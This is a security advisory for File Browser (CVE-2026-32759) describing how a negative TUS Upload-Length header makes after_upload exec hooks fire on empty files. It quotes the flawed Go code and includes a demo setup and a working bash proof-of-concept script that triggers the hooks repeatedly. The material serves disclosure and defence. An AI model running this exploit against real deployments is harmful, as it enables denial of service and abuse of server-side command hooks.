GHSA-ffx7-75gc-jg7c

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Source
https://github.com/advisories/GHSA-ffx7-75gc-jg7c
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-ffx7-75gc-jg7c/GHSA-ffx7-75gc-jg7c.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-ffx7-75gc-jg7c
Aliases
  • CVE-2026-32759
Published
2026-03-16T20:43:29Z
Modified
2026-03-20T21:33:40.830488Z
Severity
  • 5.3 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L CVSS Calculator
Summary
File Browser TUS Negative Upload-Length Fires Post-Upload Hooks Prematurely
Details

Summary

The TUS resumable upload handler parses the Upload-Length header as a signed 64-bit integer without validating that the value is non-negative. When a negative value is supplied (e.g. -1), the first PATCH request immediately satisfies the completion condition (newOffset >= uploadLength0 >= -1), causing the server to fire after_upload exec hooks with a partial or empty file. An authenticated user with upload permission can trigger any configured after_upload hook an unlimited number of times for any filename they choose, regardless of whether the file was actually uploaded - with zero bytes written.

Details

Affected file: http/tus_handlers.go

Vulnerable code - POST (register upload):

func getUploadLength(r *http.Request) (int64, error) {
    uploadOffset, err := strconv.ParseInt(r.Header.Get("Upload-Length"), 10, 64)
    // ← int64: accepts -1, -9223372036854775808, etc.
    if err != nil {
        return 0, fmt.Errorf("invalid upload length: %w", err)
    }
    return uploadOffset, nil
}

// In tusPostHandler:
uploadLength, err := getUploadLength(r)   // uploadLength = -1 (attacker-supplied)
cache.Register(file.RealPath(), uploadLength)  // stores -1 as expected size

Vulnerable code - PATCH (write chunk):

// In tusPatchHandler:
newOffset := uploadOffset + bytesWritten  // 0 + 0 = 0 (empty body)
if newOffset >= uploadLength {            // 0 >= -1 → TRUE immediately!
    cache.Complete(file.RealPath())
    _ = d.RunHook(func() error { return nil }, "upload", r.URL.Path, "", d.user)
    // ← after_upload hook fires with empty or partial file
}

The completion check uses signed comparison. Any negative uploadLength is always less than newOffset (which starts at 0), so the hook fires on the very first PATCH regardless of how many bytes were sent.

Consequence: An attacker with upload permission can: 1. Initiate a TUS upload for any filename with Upload-Length: -1 2. Send a PATCH with an empty body (Upload-Offset: 0) 3. after_upload hook fires immediately with a 0-byte (or partial) file 4. Repeat indefinitely - each POST+PATCH cycle re-fires the hook

If exec hooks are enabled and perform important operations on uploaded files (virus scanning, image processing, notifications, data pipeline ingestion), they will be triggered with attacker-controlled filenames and empty file contents.

Demo Server Setup

docker run -d --name fb-tus \
  -p 8080:80 \
  -v /tmp/fb-tus:/srv \
  -e FB_EXECER=true \
  filebrowser/filebrowser:v2.31.2

ADMIN_TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"admin"}')

# Configure a visible after_upload hook
curl -s -X PUT http://localhost:8080/api/settings \
  -H "X-Auth: $ADMIN_TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{
    "commands": {
      "after_upload": ["bash -c \"echo HOOK_FIRED: $FILE $(date) >> /tmp/hook_log.txt\""]
    }
  }'

PoC Exploit

#!/bin/bash
# poc_tus_negative_length.sh

TARGET="http://localhost:8080"

# Login as any user with upload permission
TOKEN=$(curl -s -X POST "$TARGET/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"Attack3r!pass"}')

echo "[*] Token: ${TOKEN:0:40}..."

FILENAME="/trigger_test_$(date +%s).txt"

echo "[*] Step 1: POST TUS upload with Upload-Length: -1"
curl -s -X POST "$TARGET/api/tus$FILENAME" \
  -H "X-Auth: $TOKEN" \
  -H "Upload-Length: -1" \
  -H "Content-Length: 0" \
  -v 2>&1 | grep -E "HTTP|Location"

echo ""
echo "[*] Step 2: PATCH with empty body (uploadOffset=0 >= uploadLength=-1 → hook fires)"
curl -s -X PATCH "$TARGET/api/tus$FILENAME" \
  -H "X-Auth: $TOKEN" \
  -H "Upload-Offset: 0" \
  -H "Content-Type: application/offset+octet-stream" \
  -H "Content-Length: 0" \
  -v 2>&1 | grep -E "HTTP|Upload"

echo ""
echo "[*] Checking hook log on server (/tmp/hook_log.txt)..."
echo "[*] If hook fired, you will see entries like:"
echo "    HOOK_FIRED: /srv/trigger_test_XXXX.txt <timestamp>"

echo ""
echo "[*] Repeating 5 times to demonstrate unlimited hook triggering..."
for i in $(seq 1 5); do
  FNAME="/spam_hook_$i.txt"
  curl -s -X POST "$TARGET/api/tus$FNAME" \
    -H "X-Auth: $TOKEN" \
    -H "Upload-Length: -1" \
    -H "Content-Length: 0" > /dev/null

  curl -s -X PATCH "$TARGET/api/tus$FNAME" \
    -H "X-Auth: $TOKEN" \
    -H "Upload-Offset: 0" \
    -H "Content-Type: application/offset+octet-stream" \
    -H "Content-Length: 0" > /dev/null

  echo "  Hook trigger $i sent"
done
echo "[*] Done - 5 hooks fired with 0 bytes uploaded."

Impact

Exec Hook Abuse (when enableExec = true): An attacker can trigger any after_upload exec hook an unlimited number of times with attacker-controlled filenames and empty file contents. Depending on the hook's purpose, this enables:

  • Denial of Service: Triggering expensive processing hooks (virus scanning, transcoding, ML inference) with zero cost on the attacker's side.
  • Command Injection amplification: Combined with the hook injection vulnerability (malicious filename + shell-wrapped hook), each trigger becomes a separate RCE.
  • Business logic abuse: Triggering upload-driven workflows (S3 ingestion, database inserts, notifications) with empty payloads or arbitrary filenames.

Hook-free impact: Even without exec hooks, a negative Upload-Length creates an inconsistent cache entry. The file is marked "complete" in the upload cache immediately, but the underlying file may be 0 bytes. Any subsequent read expecting a complete file will receive an empty file.

Who is affected: All deployments using the TUS upload endpoint (/api/tus). The enableExec flag amplifies the impact from cache inconsistency to remote command execution.

Resolution

This vulnerability has not been addressed, and has been added to the issue tracking all security vulnerabilities regarding the command execution (https://github.com/filebrowser/filebrowser/issues/5199). Command execution is disabled by default for all installations and users are warned if they enable it. This feature is not to be used in untrusted environments and we recommend to not use it.

Database specific
{
    "github_reviewed_at": "2026-03-16T20:43:29Z",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-190"
    ],
    "nvd_published_at": "2026-03-20T00:16:17Z",
    "severity": "MODERATE"
}
References

Affected packages

Go / github.com/filebrowser/filebrowser/v2

Package

Name
github.com/filebrowser/filebrowser/v2
View open source insights on deps.dev
Purl
pkg:golang/github.com/filebrowser/filebrowser/v2

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
2.61.1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-ffx7-75gc-jg7c/GHSA-ffx7-75gc-jg7c.json"